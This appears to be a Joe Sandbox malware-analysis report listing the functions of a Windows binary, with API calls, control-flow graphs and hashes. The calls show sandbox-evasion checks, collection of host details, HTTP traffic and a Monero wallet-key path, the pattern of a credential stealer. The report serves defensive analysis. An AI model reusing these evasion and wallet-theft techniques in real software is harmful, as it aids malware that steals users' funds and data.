                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 3c59f16b71f26a3bf26e4fcedca30fc7090c19a2d660a5d661951ffd81290f95
                            • Instruction ID: da9c4cd5e17b11e3558ccb7bba75935ced5c282880d9fc78c7147d3b093d4334
                            • Opcode Fuzzy Hash: 3c59f16b71f26a3bf26e4fcedca30fc7090c19a2d660a5d661951ffd81290f95
                            • Instruction Fuzzy Hash: 205129B4A44209EFDB08DFA4D964AFF77B6BF45704F108458E406AB280D770E992CB62
                            Function 00607500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 607500-60754a GetWindowsDirectoryA 1357 607553-6075c7 GetVolumeInformationA call 608d00 * 3 1356->1357 1358 60754c 1356->1358 1365 6075d8-6075df 1357->1365 1358->1357 1366 6075e1-6075fa call 608d00 1365->1366 1367 6075fc-607617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 607628-607658 wsprintfA call 60a740 1367->1369 1370 607619-607626 call 60a740 1367->1370 1377 60767e-60768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00607542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0060757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0060760A
                            • wsprintfA.USER32 ref: 00607640
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$a
                            • API String ID: 1544550907-2828524113
                            • Opcode ID: 85c8723c609f2675431079220cc60d8a2616c8da6b76fef202dfe3c5c0c16689
                            • Instruction ID: 56a9726eefc2ca1acf281287666ef60e6df3a831f6c86581719964664ff0c570
                            • Opcode Fuzzy Hash: 85c8723c609f2675431079220cc60d8a2616c8da6b76fef202dfe3c5c0c16689
                            • Instruction Fuzzy Hash: FC41C0B1D44248ABDB18DF94DC85BEEBBB9BF58700F100198F509672C0DB75AA44CFA5
                            Function 006069F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400618), ref: 006098A1
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400720), ref: 006098BA
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014005A0), ref: 006098D2
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014005B8), ref: 006098EA
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014007F8), ref: 00609903
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01408890), ref: 0060991B
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,013F6480), ref: 00609933
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,013F65E0), ref: 0060994C
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014007B0), ref: 00609964
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014007E0), ref: 0060997C
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400810), ref: 00609995
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400708), ref: 006099AD
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,013F6440), ref: 006099C5
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400840), ref: 006099DE
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 005F11D0: ExitProcess.KERNEL32 ref: 005F1211
                              • Part of subcall function 005F1160: GetSystemInfo.KERNEL32(?), ref: 005F116A
                              • Part of subcall function 005F1160: ExitProcess.KERNEL32 ref: 005F117E
                              • Part of subcall function 005F1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
                              • Part of subcall function 005F1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
                              • Part of subcall function 005F1110: ExitProcess.KERNEL32 ref: 005F1143
                              • Part of subcall function 005F1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
                              • Part of subcall function 005F1220: ExitProcess.KERNEL32 ref: 005F1294
                              • Part of subcall function 00606770: GetUserDefaultLangID.KERNEL32 ref: 00606774
                              • Part of subcall function 005F1190: ExitProcess.KERNEL32 ref: 005F11C6
                              • Part of subcall function 00607850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607880
                              • Part of subcall function 00607850: RtlAllocateHeap.NTDLL(00000000), ref: 00607887
                              • Part of subcall function 00607850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
                              • Part of subcall function 006078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607910
                              • Part of subcall function 006078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00607917
                              • Part of subcall function 006078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00606AF9
                            • Sleep.KERNEL32(00001770), ref: 00606B04
                            • CloseHandle.KERNEL32(?,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606B1A
                            • ExitProcess.KERNEL32 ref: 00606B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2931873225-0
                            • Opcode ID: 5e8c12a63cfc836e89c3af7d88879e9e35f1035da7cb8423da661a59994581b0
                            • Instruction ID: bd28ad8c57bebb7541662bbb8e8c0709ae355f2114454960ce37927c72e075e0
                            • Opcode Fuzzy Hash: 5e8c12a63cfc836e89c3af7d88879e9e35f1035da7cb8423da661a59994581b0
                            • Instruction Fuzzy Hash: DD310971A90209AADB4CF7E0DC56BEF777ABF44380F004518F242A61D2DF746905C6AA
                            Function 00606AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 606af3 1437 606b0a 1436->1437 1439 606aba-606ad7 call 60aad0 OpenEventA 1437->1439 1440 606b0c-606b22 call 606920 call 605b10 CloseHandle ExitProcess 1437->1440 1446 606af5-606b04 CloseHandle Sleep 1439->1446 1447 606ad9-606af1 call 60aad0 CreateEventA 1439->1447 1446->1437 1447->1440
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00606AF9
                            • Sleep.KERNEL32(00001770), ref: 00606B04
                            • CloseHandle.KERNEL32(?,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606B1A
                            • ExitProcess.KERNEL32 ref: 00606B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 233af0fce57abca33272be171d661835b9f3b519a848fc9a283464fa4a7b5c68
                            • Instruction ID: 0415258a951b2b83895d6a887a802404fd837de626e6e6879e71ac1153669f95
                            • Opcode Fuzzy Hash: 233af0fce57abca33272be171d661835b9f3b519a848fc9a283464fa4a7b5c68
                            • Instruction Fuzzy Hash: 56F0BE70AC030AABE708BBA0CC0ABBF7B35FB04300F104918B943A11C1CBB05551DA5A
                            Function 005F47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: f5f42dba7ef49e2ec42106a1fbcc587583d8b40559fbcaeb2f414ee72ee420a4
                            • Instruction ID: b6f8818f03a3c97ea48f7af5043600e1e19925ae43efd16602cabb3f262d34d8
                            • Opcode Fuzzy Hash: f5f42dba7ef49e2ec42106a1fbcc587583d8b40559fbcaeb2f414ee72ee420a4
                            • Instruction Fuzzy Hash: 90215EB1D00209ABDF14DFA4EC49ADE7B79FB44320F108629F955A72D0EB706A09CB81
                            Function 006051F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F6280: InternetOpenA.WININET(00610DFE,00000001,00000000,00000000,00000000), ref: 005F62E1
                              • Part of subcall function 005F6280: StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6303
                              • Part of subcall function 005F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6335
                              • Part of subcall function 005F6280: HttpOpenRequestA.WININET(00000000,GET,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F6385
                              • Part of subcall function 005F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F63BF
                              • Part of subcall function 005F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: eac490a2c7a73129107710ea7a6d0a30d9db5803111112bc57a3b76734b25767
                            • Instruction ID: 4f750e866e92f913839312540dfd83e15e322276c334c98c61211fa7ad53a040
                            • Opcode Fuzzy Hash: eac490a2c7a73129107710ea7a6d0a30d9db5803111112bc57a3b76734b25767
                            • Instruction Fuzzy Hash: 6E112130940208A7DB5CFFA0DD56EEE773AAF90340F40815CF90A5A1D2EF34AB06CA95
                            Function 005F1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1493 5f1220-5f1247 call 6089b0 GlobalMemoryStatusEx 1496 5f1249-5f1271 call 60da00 * 2 1493->1496 1497 5f1273-5f127a 1493->1497 1499 5f1281-5f1285 1496->1499 1497->1499 1501 5f129a-5f129d 1499->1501 1502 5f1287 1499->1502 1504 5f1289-5f1290 1502->1504 1505 5f1292-5f1294 ExitProcess 1502->1505 1504->1501 1504->1505
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
                            • ExitProcess.KERNEL32 ref: 005F1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 229ced96b01c11d10c9003afd2c338a279313219fad64ddff27213fb3dffb6a6
                            • Instruction ID: 0ca4c0cd145a653a461ee7d653060c235609d62154d899799f8a677da1b6c049
                            • Opcode Fuzzy Hash: 229ced96b01c11d10c9003afd2c338a279313219fad64ddff27213fb3dffb6a6
                            • Instruction Fuzzy Hash: BA014BB098030CEAEB14EBE4CC49BAEBB79BB04701F608548E705B62C0D7785541879D
                            Function 006078E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 181a6c1d624cc2895e2733a8bfa7f82a923a442430a504c32a04fb5cb42f616f
                            • Instruction ID: 73c35fa54244f65b7bd7d2c7f63ddf809a6c216754c052600dfb6355ed9aa16f
                            • Opcode Fuzzy Hash: 181a6c1d624cc2895e2733a8bfa7f82a923a442430a504c32a04fb5cb42f616f
                            • Instruction Fuzzy Hash: 410186B1944204EBC704DF98DD45BABBBB8FB44B21F104629F545E32C0C37559048BA1
                            Function 005F1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
                            • ExitProcess.KERNEL32 ref: 005F1143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 6094570cf4ddb38fa7c51e7256db51ee68e301e0f45cfa2ec671734de21455ba
                            • Instruction ID: 19960d90252fb2ffee4f6c75d7c0bcf44feb1358a354f82cf92d1e8e60be5345
                            • Opcode Fuzzy Hash: 6094570cf4ddb38fa7c51e7256db51ee68e301e0f45cfa2ec671734de21455ba
                            • Instruction Fuzzy Hash: CAE0E67094534CFBE7146BA0DC0EB197A78BB44B01F104454F749765D0D6B52640969D
                            Function 005F10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
